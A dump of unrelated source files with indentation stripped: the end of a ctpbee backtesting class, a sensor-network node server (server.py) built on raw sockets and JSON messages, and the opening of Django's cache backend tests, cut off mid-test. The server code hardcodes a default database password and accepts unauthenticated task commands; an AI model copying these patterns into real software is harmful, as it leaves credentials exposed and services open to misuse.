return (self._looper_status, self._risk_status, self._strategy_status, self._data_status)
def run(self):
""" 开始运行回测 """
p = Thread(name="looper", target=self.letsgo, args=(self.params, self.ready,))
p.start()
p.join()
def __repr__(self):
return "ctpbee Backtesting Vessel powered by ctpbee current version: 0.1"
|
server.py
|
# Copyright 2020 Center for Intelligent and Networked Systems, Department of Automation, Tsinghua University, Beijing, China.
# This program is distributed under the Apache license 2.0.
# Supported by National Key Research and Development Project of China (No. 2017YFC0704100 entitled New generation intelligent building platform techniques) and the National Natural Science Foundation of China (No. 61425027), the 111 International Collaboration Program of China under Grant BP2018006.
import json
import threading
import socket
import random
import sys
import time
import question
import traceback
import pysnooperDB
# import pysnooper
class Sensor(object):
sensorID = 0
IP = ""
PORT = []
IPlist = []
sensorInfo = {}
adjID = []
adjDirection = []
datalist = []
GUIinfo = []
taskID = ""
parentID = 0
sonID = []
sonFlag = []
sonData = []
mesQue = []
threads = []
flag = 0
sonFlag2 = 0
treeFlag = 0
dataFlag = 0
taskFlag = 0
taskBeginFlag = 0
tk = 0
adjData = []
adjDataList = []
adjFeedback = []
adjFlag = []
adjFlag2 = 0
adjFeedbackFlag = []
adjFeedbackFlag2 = 0
adjSyncStatus = []
adjSyncFlag = 0
observelist = []
tablenamePrefix = ''
user=''
passwd=''
databasename = ''
debugmode_flag = 0
def __init__(self, ID, adjID, adjDirection, IPlist,IP,PORT,datalist, tablenamePrefix = 'task', observelist = [],\
user = 'root', passwd = '08191920.yh',databasename = 'TESTDB', debugmode_flag = 0):
self.sensorID = int(ID)
self.parentID = int(ID)
self.IP = IP
self.PORT = PORT
self.adjID = adjID
self.adjDirection = adjDirection
self.IPlist = IPlist
self.datalist = datalist
self.IP = socket.gethostbyname(self.IP)
self.observelist = observelist
self.tablenamePrefix = tablenamePrefix
self.user = user
self.passwd = passwd
self.databasename = databasename
self.debugmode_flag = debugmode_flag
for i in range(len(self.adjID)):
self.adjData.append([])
# self.adjDataList.append([])
self.adjFeedback.append([])
self.adjFlag.append(0)
self.adjFeedbackFlag.append(0)
self.adjSyncStatus.append(0)
# @pysnooper.snoop("sever_create.log")
def createServer(self,host, port):
cont = """HTTP/1.1 200 OK\r\n\r\n"""
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((host, port))
s.listen(100)
print ("Server on " + host + ":" + str(port))
while 1:
conn, addr = s.accept()
request = conn.recv(655350)
request = bytes.decode(request)
method = request.split(' ')[0]
if method == 'POST':
form = request.split('\r\n')
data = form[-1]
try:
jdata = json.loads(data)
except Exception:
self.sendUDP("通信JSON数据格式错误")
else:
#Comunication Topology Construction
if jdata["key"] == "connect":
if self.flag == 0:
self.flag = 1
self.parentID = jdata["id"]
print (host + ":" + str(port) + " connected to " + jdata["host"] + ":" + str(jdata["port"]))
data = {
"key": "connect",
"host": host,
"port": port,
"id": self.sensorID
}
ndata = json.dumps(data)
content = cont + ndata
conn.sendall(str.encode(content))
for ele in self.IPlist:
if ele != []:
if ele[4] != self.parentID:
self.connect(ele[0],ele[1],ele[2],ele[3])
#leaf?
if len(self.sonID) == 0:
data = {
"key": "OK",
"id": self.sensorID
}
ndata = json.dumps(data)
self.send(jdata["id"], data=ndata)
for i in range(len(self.sonFlag)):
self.sonFlag[i] = 0
else:
data = {
"key": "connected",
"host": host,
"port": port,
"id": self.sensorID
}
mdata = json.dumps(data)
content = cont + mdata
conn.sendall(str.encode(content))
elif jdata["key"] == "OK":
data = {
"key": "OK",
"id": self.sensorID
}
ndata = json.dumps(data)
for i in range(len(self.sonID)):
if self.sonID[i] == jdata["id"]:
self.sonFlag[i] = 1
nflag = 1
for ele in self.sonFlag:
if ele == 0:
nflag = 0
if nflag == 1:
if self.parentID != self.sensorID:
for ele in self.IPlist:
if ele != []:
if ele[4] == self.parentID:
self.send(ele[4], data=ndata)
else:
self.treeFlag = 1
print ("The whole tree has been constructed!")
for i in range(len(self.sonFlag)):
self.sonFlag[i] = 0
# Task Distribution
elif jdata["key"] == "task":
self.taskID = jdata["taskID"]
try:
self.GUIinfo.append(jdata["GUIinfo"][0])
self.GUIinfo.append(jdata["GUIinfo"][1])
self.sendUDP("任务开始执行")
except Exception as e:
print ("非来自GUI的任务请求")
if self.sonID != 0:
for ele in self.IPlist:
if ele != []:
if ele[4] in self.sonID:
sjdata = json.dumps(jdata)
self.send(ele[4], data=sjdata)
self.taskBeginFlag = 1
# Data Collection
elif jdata["key"] == "data":
mdata = jdata["data"]
for i in range(len(self.sonID)):
if self.sonID[i] == jdata["id"]:
self.sonData[i] = mdata
self.sonFlag[i] = 1
nflag = 1
for ele in self.sonData:
if ele == []:
nflag = 0
if nflag == 1:
self.sonFlag2 = 1
# question
elif jdata["key"] == "questionData":
if jdata["type"] == "value":
for i in range(len(self.adjID)):
if(self.adjID[i] == jdata["id"]):
self.adjFlag[i] = 1
self.adjData[i] = jdata["data"]
# self.adjDataList[i].append(jdata["data"])
nflag = 1
for ele in self.adjFlag:
if ele == 0:
nflag = 0
if nflag == 1:
self.adjFlag2 = 1
elif jdata["type"] == "feedback":
for i in range(len(self.adjID)):
if (self.adjID[i] == jdata["id"]):
self.adjFeedbackFlag[i] = 1
self.adjFeedback[i] = jdata["data"]
# self.adjDataList[i].append(jdata["data"])
nflag = 1
for ele in self.adjFeedbackFlag:
if ele == 0:
nflag = 0
if nflag == 1:
self.adjFeedbackFlag2 = 1
conn.send(str.encode(cont))
elif jdata["key"] == "sync":
for i in range(len(self.adjID)):
if(self.adjID[i] == jdata["id"]):
self.adjSyncStatus[i] = 1
nflag = 1
for ele in self.adjSyncStatus:
if ele == 0:
nflag = 0
if nflag == 1:
self.adjSyncFlag = 1
else:
conn.send(str.encode(cont+"请不要直接访问通信服务器"))
else:
conn.send(str.encode(cont + "请不要直接访问通信服务器"))
conn.close()
#Task Server
# @pysnooper.snoop("sever_task.log")
def taskServer(self,host,port):
cont = """HTTP/1.1 200 OK\r\n\r\n"""
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((host, port))
s.listen(100)
print ("TaskServer: " + host + ":" + str(port))
while 1:
conn, addr = s.accept()
request = conn.recv(10000000)
request = bytes.decode(request)
method = request.split(' ')[0]
if method == "POST":
form = request.split('\r\n')
data = form[-1]
try:
jdata = json.loads(data)
except (ValueError, KeyError, TypeError):
conn.send(str.encode(cont + "请输入JSON格式的数据!"))
else:
if jdata["key"] == "task":
try:
self.GUIinfo.append(jdata["GUIinfo"][0])
self.GUIinfo.append(jdata["GUIinfo"][1])
self.sendUDP("接收任务请求")
except KeyError:
print ("非来自GUI的任务请求")
self.flag = 1
self.taskID = jdata["taskID"]
sum = 0
for ele in self.IPlist:
if ele != []:
self.connect(ele[0], ele[1], ele[2], ele[3])
sum += 1
if(sum == 0): self.treeFlag = 1
while (self.treeFlag == 0): {time.sleep(0.01)}
self.sendUDP("通信树建立完成")
self.sendUDP("任务开始执行")
for ele in self.IPlist:
if ele != []:
sdata = {
"key": "task",
"taskID": self.taskID,
"GUIinfo": self.GUIinfo
}
sjdata = json.dumps(sdata)
self.send(ele[4], data=sjdata)
self.taskBeginFlag = 1
while (self.taskFlag == 0):{time.sleep(0.01)}
while (self.dataFlag == 0):{time.sleep(0.01)}
self.sendUDP("数据收集完毕")
if self.taskID == "averageTemperature":
sum = 0
for ele in self.mesQue:
sum = sum + ele["info"]["temperature"]
content = cont + "sensorID:" + str(self.sensorID) + "\n" + "dataNum:" + str(len(self.mesQue)) + "\naverage:" + str(float(sum)/len(self.mesQue))
else:
info = []
for i in range(len(self.mesQue)):
info.append({})
info[i]["value"] = self.mesQue[i]["info"]["value"]
info[i]["ID"] = self.mesQue[i]["id"]
content = cont + "sensorID:" + str(self.sensorID) + "\n" + "dataNum:" + str(len(self.mesQue)) + "\nInfo:" + str(info)
conn.sendall(str.encode(content))
self.reset()
self.treeFlag = 0
self.dataFlag = 0
elif jdata["key"] == "newNode":
self.IPlist = jdata["IPlist"]
self.adjID.append(jdata["id"])
elif jdata["key"] == "deleteNode":
self.IPlist = jdata["IPlist"]
self.adjID = jdata["adjID"]
else:
conn.send(str.encode(cont + "您输入的任务信息有误!"))
else:
conn.send(str.encode(cont + "暂未提供GET接口返回数据"))
conn.close()
# @pysnooper.snoop("sever_connect.log")
def connect(self,host1,port1,host2,port2):
print (host1 + ":" + str(port1) + " connecting to " + host2 + ":" + str(port2))
data = {
"key": "connect",
"host": host1,
"port": port1,
"id": self.sensorID
}
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
remote_ip = socket.gethostbyname(host2)
s.connect((remote_ip, port2))
message = "POST / HTTP/1.1\r\n\r\n"
jsondata = json.dumps(data)
message += jsondata
s.sendall(str.encode(message))
reply = s.recv(10000)
reply = bytes.decode(reply)
res = reply.split('\r\n')[-1]
jres = json.loads(res)
if jres['key'] == 'connect':
self.sonID.append(jres["id"])
self.sonFlag.append(0)
self.sonData.append([])
def send(self,id,data):
for ele in self.IPlist:
if ele!=[]:
if ele[4] == id:
host = ele[2]
port = ele[3]
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
remote_ip = socket.gethostbyname(host)
s.connect((remote_ip, port))
message = "POST / HTTP/1.1\r\n\r\n"
message += data
s.sendall(str.encode(message))
break
def sendDataToID(self, id, data):
data = {
"key": "questionData",
"type": "value",
"id": self.sensorID,
"data": data
}
ndata = json.dumps(data)
for ele in self.IPlist:
if ele != []:
if ele[4] == id:
self.send(ele[4], ndata)
def sendDataToDirection(self, direction, data):
data = {
"key": "questionData",
"type": "value",
"id": self.sensorID,
"data": data
}
ndata = json.dumps(data)
for i in range(len(self.adjID)):
if self.adjDirection[i] == direction:
for ele in self.IPlist:
if ele != []:
if ele[4] == self.adjID[i]:
self.send(ele[4], ndata)
def sendData(self, data):
data = {
"key": "questionData",
"type": "value",
"id": self.sensorID,
"data": data
}
ndata = json.dumps(data)
for ele in self.IPlist:
if ele != []:
self.send(ele[4], ndata)
def receive(self):
return self.adjData
# @pysnooper.snoop("sever_udp.log")
def sendUDP(self, info):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
addr = (self.GUIinfo[0], self.GUIinfo[1])
data = {
"key": "runData",
"id": self.sensorID,
"info": info
}
s.sendto(json.dumps(data).encode('utf-8'), addr)
s.close()
except Exception as e:
print (info)
def taskFunction(self):
while 1:
time.sleep(0.01)
if self.taskBeginFlag == 1:
self.taskBeginFlag = 0
if self.taskID == "averageTemperature":
self.sensorInfo["temperature"] = random.randint(20,30)
self.taskFlag = 1
elif self.taskID == "sonID":
self.sensorInfo["value"] = self.sonID
self.taskFlag = 1
elif self.taskID == "question":
try:
if self.debugmode_flag:
tablename = self.tablenamePrefix + "_node" + str(self.sensorID)
filename = "./log/" + self.tablenamePrefix + "_node" + str(self.sensorID) + '.log'
# 观察数据
# self.observelist = ["m","x","adjData"]
# taskfunc = pysnooper.snoop(filename)(question.taskFunction)
taskfunc = pysnooperDB.snoop(tablename = tablename,observelist = self.observelist,\
user= self.user, passwd= self.passwd,databasename = self.databasename)(question.taskFunction)
else:
taskfunc = question.taskFunction
value = taskfunc(self, self.sensorID, self.adjDirection, self.datalist)
self.sensorInfo["value"] = value
self.sendUDP("任务执行完毕")
print (value)
except Exception as e:
self.sensorInfo["value"] = ""
self.sendUDP("任务执行出错")
self.sendUDP(traceback.format_exc())
self.taskFlag = 1
if self.sonID == []:
if self.parentID == self.sensorID:
sdata = {
"id": self.sensorID,
"info": self.sensorInfo
}
self.mesQue.append(sdata)
self.dataFlag = 1
print ("The whole data has been transmitted!")
else:
sdata = {
"id": self.sensorID,
"info": self.sensorInfo
}
self.mesQue.append(sdata)
data = {
"key": "data",
"id": self.sensorID,
"data": self.mesQue
}
ndata = json.dumps(data)
self.send(self.parentID, ndata)
self.reset()
else:
while self.sonFlag2 == 0:{time.sleep(0.01)}
sdata = {
"id": self.sensorID,
"info": self.sensorInfo
}
self.mesQue.append(sdata)
for ele in self.sonData:
for ele2 in ele:
self.mesQue.append(ele2)
if self.parentID != self.sensorID:
data = {
"key": "data",
"id": self.sensorID,
"data": self.mesQue
}
ndata = json.dumps(data)
self.send(self.parentID, data=ndata)
self.reset()
else:
self.dataFlag = 1
print ("The whole data has been transmitted!")
# @pysnooper.snoop("sever_run.log")
def run(self):
#创建接口服务器
for i in range(6):
t = threading.Thread(target=self.createServer,args=(self.IP,self.PORT[i],))
self.threads.append(t)
taskServerthread = threading.Thread(target=self.taskServer,args=(self.IP,self.PORT[6],))
taskthread = threading.Thread(target=self.taskFunction, args=())
for i in range(6):
self.threads[i].start()
taskServerthread.start()
taskthread.start()
for i in range(6):
self.threads[i].join()
taskServerthread.join()
taskthread.join()
def shutdown(self):
sys.exit(0)
def reset(self):
self.parentID = self.sensorID
self.flag = 0
self.sonID = []
self.mesQue = []
self.sonFlag = []
self.sonFlag2 = 0
self.sonData = []
def transmitData(self,tmp2):
if (self.tk % 2 == 0):
self.tk += 1
data = {
"key": "questionData",
"type": "value",
"id": self.sensorID,
"data": tmp2
}
ndata = json.dumps(data)
for ele in self.IPlist:
if ele != []:
self.send(ele[4], ndata)
while self.adjFlag2 == 0: {time.sleep(0.01)}
tmp = json.loads(json.dumps([self.adjDirection, self.adjData]))
self.adjFlag2 = 0
for i in range(len(self.adjData)):
self.adjData[i] = []
for i in range(len(self.adjFlag)):
self.adjFlag[i] = 0
return tmp
else:
self.tk += 1
data = {
"key": "questionData",
"type": "feedback",
"id": self.sensorID,
"data": tmp2
}
ndata = json.dumps(data)
for ele in self.IPlist:
if ele != []:
self.send(ele[4], ndata)
while self.adjFeedbackFlag2 == 0: {time.sleep(0.01)}
tmp = json.loads(json.dumps([self.adjDirection, self.adjFeedback]))
for i in range(len(self.adjFeedback)):
self.adjFeedback[i] = []
for i in range(len(self.adjFeedbackFlag)):
self.adjFeedbackFlag[i] = 0
self.adjFeedbackFlag2 = 0
return tmp
def syncNode(self):
data = {
"key": "sync",
"id": self.sensorID
}
ndata = json.dumps(data)
for ele in self.IPlist:
if ele != []:
self.send(ele[4], ndata)
while self.adjSyncFlag == 0:
time.sleep(0.01)
self.adjSyncFlag = 0
for i in range(len(self.adjSyncStatus)):
self.adjSyncStatus[i] = 0
return 0
|
tests.py
|
# -*- coding: utf-8 -*-
# Unit tests for cache framework
# Uses whatever cache backend is set in the test settings file.
from __future__ import unicode_literals
import copy
import os
import re
import shutil
import tempfile
import threading
import time
import unittest
import warnings
from django.conf import settings
from django.core import management, signals
from django.core.cache import (
DEFAULT_CACHE_ALIAS, CacheKeyWarning, cache, caches,
)
from django.core.cache.utils import make_template_fragment_key
from django.db import connection, connections, transaction
from django.http import HttpRequest, HttpResponse, StreamingHttpResponse
from django.middleware.cache import (
CacheMiddleware, FetchFromCacheMiddleware, UpdateCacheMiddleware,
)
from django.middleware.csrf import CsrfViewMiddleware
from django.template import engines
from django.template.context_processors import csrf
from django.template.response import TemplateResponse
from django.test import (
RequestFactory, TestCase, TransactionTestCase, override_settings,
)
from django.test.signals import setting_changed
from django.utils import six, timezone, translation
from django.utils.cache import (
get_cache_key, learn_cache_key, patch_cache_control,
patch_response_headers, patch_vary_headers,
)
from django.utils.encoding import force_text
from django.views.decorators.cache import cache_page
from .models import Poll, expensive_calculation
try: # Use the same idiom as in cache backends
from django.utils.six.moves import cPickle as pickle
except ImportError:
import pickle
# functions/classes for complex data type tests
def f():
return 42
class C:
def m(n):
return 24
class Unpickable(object):
def __getstate__(self):
raise pickle.PickleError()
@override_settings(CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.dummy.DummyCache',
}
})
class DummyCacheTests(TestCase):
# The Dummy cache backend doesn't really behave like a test backend,
# so it has its own test case.
def test_simple(self):
"Dummy cache backend ignores cache set calls"
cache.set("key", "value")
self.assertIsNone(cache.get("key"))
def test_add(self):
"Add doesn't do anything in dummy cache backend"
cache.add("addkey1", "value")
result = cache.add("addkey1", "newvalue")
self.assertTrue(result)
self.assertIsNone(cache.get("addkey1"))
def test_non_existent(self):
"Non-existent keys aren't found in the dummy cache backend"
self.assertIsNone(cache.get("does_not_exist"))
self.assertEqual(cache.get("does_not_exist", "bang!"), "bang!")
def test_get_many(self):
"get_many returns nothing for the dummy cache backend"
cache.set('a', 'a')
cache.set('b', 'b')
cache.set('c', 'c')
cache.set('d', 'd')
self.assertEqual(cache.get_many(['a', 'c', 'd']), {})
self.assertEqual(cache.get_many(['a', 'b', 'e']), {})
def test_delete(self):
"Cache deletion is transparently ignored on the dummy cache backend"
cache.set("key1", "spam")
cache.set("key2", "eggs")
self.assertIsNone(cache.get("key1"))
cache.delete("key1")
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
def test_has_key(self):
"The has_key method doesn't ever return True for the dummy cache backend"
cache.set("hello1", "goodbye1")
self.assertFalse(cache.has_key("hello1"))
self.assertFalse(cache.has_key("goodbye1"))
def test_in(self):
"The in operator doesn't ever return True for the dummy cache backend"
cache.set("hello2", "goodbye2")
self.assertNotIn("hello2", cache)
self.assertNotIn("goodbye2", cache)
def test_incr(self):
"Dummy cache values can't be incremented"
cache.set('answer', 42)
self.assertRaises(ValueError, cache.incr, 'answer')
self.assertRaises(ValueError, cache.incr, 'does_not_exist')
def test_decr(self):
"Dummy cache values can't be decremented"
cache.set('answer', 42)
self.assertRaises(ValueError, cache.decr, 'answer')
self.assertRaises(ValueError, cache.decr, 'does_not_exist')
def test_data_types(self):
"All data types are ignored equally by the dummy cache"
stuff = {
'string': 'this is a string',
'int': 42,
'list': [1, 2, 3, 4],
'tuple': (1, 2, 3, 4),
'dict': {'A': 1, 'B': 2},
'function': f,
'class': C,
}
cache.set("stuff", stuff)
self.assertIsNone(cache.get("stuff"))
def test_expiration(self):
"Expiration has no effect on the dummy cache"
cache.set('expire1', 'very quickly', 1)
cache.set('expire2', 'very quickly', 1)
cache.set('expire3', 'very quickly', 1)
time.sleep(2)
self.assertIsNone(cache.get("expire1"))
cache.add("expire2", "newvalue")
self.assertIsNone(cache.get("expire2"))
self.assertFalse(cache.has_key("expire3"))
def test_unicode(self):
"Unicode values are ignored by the dummy cache"
stuff = {
'ascii': 'ascii_value',
'unicode_ascii': 'Iñtërnâtiônàlizætiøn1',
'Iñtërnâtiônàlizætiøn': 'Iñtërnâtiônàlizætiøn2',
'ascii2': {'x': 1}
}
for (key, value) in stuff.items():
cache.set(key, value)
self.assertIsNone(cache.get(key))
def test_set_many(self):
"set_many does nothing for the dummy cache backend"
cache.set_many({'a': 1, 'b': 2})
cache.set_many({'a': 1, 'b': 2}, timeout=2, version='1')
def test_delete_many(self):
"delete_many does nothing for the dummy cache backend"
cache.delete_many(['a', 'b'])
def test_clear(self):
"clear does nothing for the dummy cache backend"
cache.clear()
def test_incr_version(self):
"Dummy cache versions can't be incremented"
cache.set('answer', 42)
self.assertRaises(ValueError, cache.incr_version, 'answer')
self.assertRaises(ValueError, cache.incr_version, 'does_not_exist')
def test_decr_version(self):
"Dummy cache versions can't be decremented"
cache.set('answer', 42)
self.assertRaises(ValueError, cache.decr_version, 'answer')
self.assertRaises(ValueError, cache.decr_version, 'does_not_exist')
def custom_key_func(key, key_prefix, version):
"A customized cache key function"
return 'CUSTOM-' + '-'.join([key_prefix, str(version), key])
_caches_setting_base = {
'default': {},
'prefix': {'KEY_PREFIX': 'cacheprefix{}'.format(os.getpid())},
'v2': {'VERSION': 2},
'custom_key': {'KEY_FUNCTION': custom_key_func},
'custom_key2': {'KEY_FUNCTION': 'cache.tests.custom_key_func'},
'cull': {'OPTIONS': {'MAX_ENTRIES': 30}},
'zero_cull': {'OPTIONS': {'CULL_FREQUENCY': 0, 'MAX_ENTRIES': 30}},
}
def caches_setting_for_tests(base=None, **params):
# `base` is used to pull in the memcached config from the original settings,
# `params` are test specific overrides and `_caches_settings_base` is the
# base config for the tests.
# This results in the following search order:
# params -> _caches_setting_base -> base
base = base or {}
setting = {k: base.copy() for k in _caches_setting_base.keys()}
for key, cache_params in setting.items():
cache_params.update(_caches_setting_base[key])
cache_params.update(params)
return setting
class BaseCacheTests(object):
# A common set of tests to apply to all cache backends
def setUp(self):
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
def test_simple(self):
# Simple cache set/get works
cache.set("key", "value")
self.assertEqual(cache.get("key"), "value")
def test_add(self):
# A key can be added to a cache
cache.add("addkey1", "value")
result = cache.add("addkey1", "newvalue")
self.assertFalse(result)
self.assertEqual(cache.get("addkey1"), "value")
def test_prefix(self):
# Test for same cache key conflicts between shared backend
cache.set('somekey', 'value')
# should not be set in the prefixed cache
self.assertFalse(caches['prefix'].has_key('somekey'))
caches['prefix'].set('somekey', 'value2')
self.assertEqual(cache.get('somekey'), 'value')
self.assertEqual(caches['prefix'].get('somekey'), 'value2')
def test_non_existent(self):
# Non-existent cache keys return as None/default
# get with non-existent keys
self.assertIsNone(cache.get("does_not_exist"))
self.assertEqual(cache.get("does_not_exist", "bang!"), "bang!")
def test_get_many(self):
# Multiple cache keys can be returned using get_many
cache.set('a', 'a')
cache.set('b', 'b')
cache.set('c', 'c')
cache.set('d', 'd')
self.assertDictEqual(cache.get_many(['a', 'c', 'd']), {'a': 'a', 'c': 'c', 'd': 'd'})
self.assertDictEqual(cache.get_many(['a', 'b', 'e']), {'a': 'a', 'b': 'b'})
def test_delete(self):
# Cache keys can be deleted
cache.set("key1", "spam")
cache.set("key2", "eggs")
self.assertEqual(cache.get("key1"), "spam")
cache.delete("key1")
self.assertIsNone(cache.get("key1"))
self.assertEqual(cache.get("key2"), "eggs")
def test_has_key(self):
# The cache can be inspected for cache keys
cache.set("hello1", "goodbye1")
self.assertTrue(cache.has_key("hello1"))
self.assertFalse(cache.has_key("goodbye1"))
cache.set("no_expiry", "here", None)
self.assertTrue(cache.has_key("no_expiry"))
def test_in(self):
# The in operator can be used to inspect cache contents
cache.set("hello2", "goodbye2")
self.assertIn("hello2", cache)
self.assertNotIn("goodbye2", cache)
def test_incr(self):
# Cache values can be incremented
cache.set('answer', 41)
self.assertEqual(cache.incr('answer'), 42)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.incr('answer', 10), 52)
self.assertEqual(cache.get('answer'), 52)
self.assertEqual(cache.incr('answer', -10), 42)
self.assertRaises(ValueError, cache.incr, 'does_not_exist')
def test_decr(self):
# Cache values can be decremented
cache.set('answer', 43)
self.assertEqual(cache.decr('answer'), 42)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.decr('answer', 10), 32)
self.assertEqual(cache.get('answer'), 32)
self.assertEqual(cache.decr('answer', -10), 42)
self.assertRaises(ValueError, cache.decr, 'does_not_exist')
def test_close(self):
self.assertTrue(hasattr(cache, 'close'))
cache.close()
def test_data_types(self):
# Many different data types can be cached
stuff = {
'string': 'this is a string',
'int': 42,
'list': [1, 2, 3, 4],
'tuple': (1, 2, 3, 4),
'dict': {'A': 1, 'B': 2},
'function': f,
'class': C,
}
cache.set("stuff", stuff)
self.assertEqual(cache.get("stuff"), stuff)
def test_cache_read_for_model_instance(self):
# Don't want fields with callable as default to be called on cache read
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
my_poll = Poll.objects.create(question="Well?")
self.assertEqual(Poll.objects.count(), 1)
pub_date = my_poll.pub_date
cache.set('question', my_poll)
cached_poll = cache.get('question')
self.assertEqual(cached_poll.pub_date, pub_date)
# We only want the default expensive calculation run once
self.assertEqual(expensive_calculation.num_runs, 1)
def test_cache_write_for_model_instance_with_deferred(self):
# Don't want fields with callable as default to be called on cache write
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
Poll.objects.create(question="What?")
self.assertEqual(expensive_calculation.num_runs, 1)
defer_qs = Poll.objects.all().defer('question')
self.assertEqual(defer_qs.count(), 1)
self.assertEqual(expensive_calculation.num_runs, 1)
cache.set('deferred_queryset', defer_qs)
# cache set should not re-evaluate default functions
self.assertEqual(expensive_calculation.num_runs, 1)
def test_cache_read_for_model_instance_with_deferred(self):
# Don't want fields with callable as default to be called on cache read
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
Poll.objects.create(question="What?")
self.assertEqual(expensive_calculation.num_runs, 1)
defer_qs = Poll.objects.all().defer('question')
self.assertEqual(defer_qs.count(), 1)
cache.set('deferred_queryset', defer_qs)
self.assertEqual(expensive_calculation.num_runs, 1)
runs_before_cache_read = expensive_calculation.num_runs
cache.get('deferred_queryset')
# We only want the default expensive calculation run on creation and set
self.assertEqual(expensive_calculation.num_runs, runs_before_cache_read)
def test_expiration(self):
# Cache values can be set to expire
cache.set('expire1', 'very quickly', 1)
cache.set('expire2', 'very quickly', 1)
cache.set('expire3', 'very quickly', 1)
time.sleep(2)
self.assertIsNone(cache.get("expire1"))
cache.add("expire2", "newvalue")
self.assertEqual(cache.get("expire2"), "newvalue")
self.assertFalse(cache.has_key("expire3"))
def test_unicode(self):
# Unicode values can be cached
stuff = {
'ascii': 'ascii_value',
'unicode_ascii': 'Iñtërnâtiônàlizætiøn1',
'Iñtërnâtiônàlizætiøn': 'Iñtërnâtiônàlizætiøn2',
'ascii2': {'x': 1}
}
# Test `set`
for (key, value) in stuff.items():
cache.set(key, value)
self.assertEqual(cache.get(key), value)
# Test `add`
for (key, value) in stuff.items():
cache.delete(key)
cache.add(key, value)
self.assertEqual(cache.get(key), value)
# Test `set_many`
for (key, value) in stuff.items():
cache.delete(key)
cache.set_many(stuff)
for (key, value) in stuff.items():
self.assertEqual(cache.get(key), value)
def test_binary_string(self):
# Binary strings should be cacheable
from zlib import compress, decompress
value = 'value_to_be_compressed'
compressed_value = compress(value.encode())
# Test set
cache.set('binary1', compressed_value)
compressed_result = cache.get('binary1')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
# Test add
cache.add('binary1-add', compressed_value)
compressed_result = cache.get('binary1-add')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
# Test set_many
cache.set_many({'binary1-set_many': compressed_value})
compressed_result = cache.get('binary1-set_many')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
def test_set_many(self):
# Multiple keys can be set using set_many
cache.set_many({"key1": "spam", "key2": "eggs"})
self.assertEqual(cache.get("key1"), "spam")
self.assertEqual(cache.get("key2"), "eggs")
def test_set_many_expiration(self):
# set_many takes a second ``timeout`` parameter
cache.set_many({"key1": "spam", "key2": "eggs"}, 1)
time.sleep(2)
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
def test_delete_many(self):
# Multiple keys can be deleted using delete_many
cache.set("key1", "spam")
cache.set("key2", "eggs")
cache.set("key3", "ham")
cache.delete_many(["key1", "key2"])
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
self.assertEqual(cache.get("key3"), "ham")
def test_clear(self):
# The cache can be emptied using clear
cache.set("key1", "spam")
cache.set("key2", "eggs")
cache.clear()
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
def test_long_timeout(self):
'''
Using a timeout greater than 30 days makes memcached think
it is an absolute expiration timestamp instead of a relative
offset. Test that we honour this convention. Refs #12399.
'''
cache.set('key1', 'eggs', 60 * 60 * 24 * 30 + 1) # 30 days + 1 second
self.assertEqual(cache.get('key1'), 'eggs')
cache.add('key2', 'ham', 60 * 60 * 24 * 30 + 1)
self.assertEqual(cache.get('key2'), 'ham')
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, 60 * 60 * 24 * 30 + 1)
self.assertEqual(cache.get('key3'), 'sausage')
self.assertEqual(cache.get('key4'), 'lobster bisque')
def test_forever_timeout(self):
'''
Passing in None into timeout results in a value that is cached forever
'''
cache.set('key1', 'eggs', None)
self.assertEqual(cache.get('key1'), 'eggs')
cache.add('key2', 'ham', None)
self.assertEqual(cache.get('key2'), 'ham')
added = cache.add('key1', 'new eggs', None)
self.assertEqual(added, False)
self.assertEqual(cache.get('key1'), 'eggs')
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, None)
self.assertEqual(cache.get('key3'), 'sausage')
self.assertEqual(cache.get('key4'), 'lobster bisque')
def test_zero_timeout(self):
'''
Passing in zero into timeout results in a value that is not cached
'''
cache.set('key1', 'eggs', 0)
self.assertIsNone(cache.get('key1'))
cache.add('key2', 'ham', 0)
self.assertIsNone(cache.get('key2'))
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, 0)
self.assertIsNone(cache.get('key3'))
self.assertIsNone(cache.get('key4'))
def test_float_timeout(self):
# Make sure a timeout given as a float doesn't crash anything.
cache.set("key1", "spam", 100.2)
self.assertEqual(cache.get("key1"), "spam")
def _perform_cull_test(self, cull_cache, initial_count, final_count):
# Create initial cache key entries. This will overflow the cache,
# causing a cull.
for i in range(1, initial_count):
cull_cache.set('cull%d' % i, 'value', 1000)
count = 0
# Count how many keys are left in the cache.
for i in range(1, initial_count):
if cull_cache.has_key('cull%d' % i):
count = count + 1
self.assertEqual(count, final_count)
def test_cull(self):
self._perform_cull_test(caches['cull'], 50, 29)
def test_zero_cull(self):
self._perform_cull_test(caches['zero_cull'], 50, 19)
def test_invalid_keys(self):
"""
All the builtin backends (except memcached, see below) should warn on
keys that would be refused by memcached. This encourages portable
caching code without making it too difficult to use production backends
with more liberal key rules. Refs #6447.
"""
# mimic custom ``make_key`` method being defined since the default will
# never show the below warnings
def func(key, *args):
return key
old_func = cache.key_func
cache.key_func = func
try:
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
# memcached does not allow whitespace or control characters in keys
cache.set('key with spaces', 'value')
self.assertEqual(len(w), 2)
self.assertIsInstance(w[0].message, CacheKeyWarning)
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
# memcached limits key length to 250
cache.set('a' * 251, 'value')
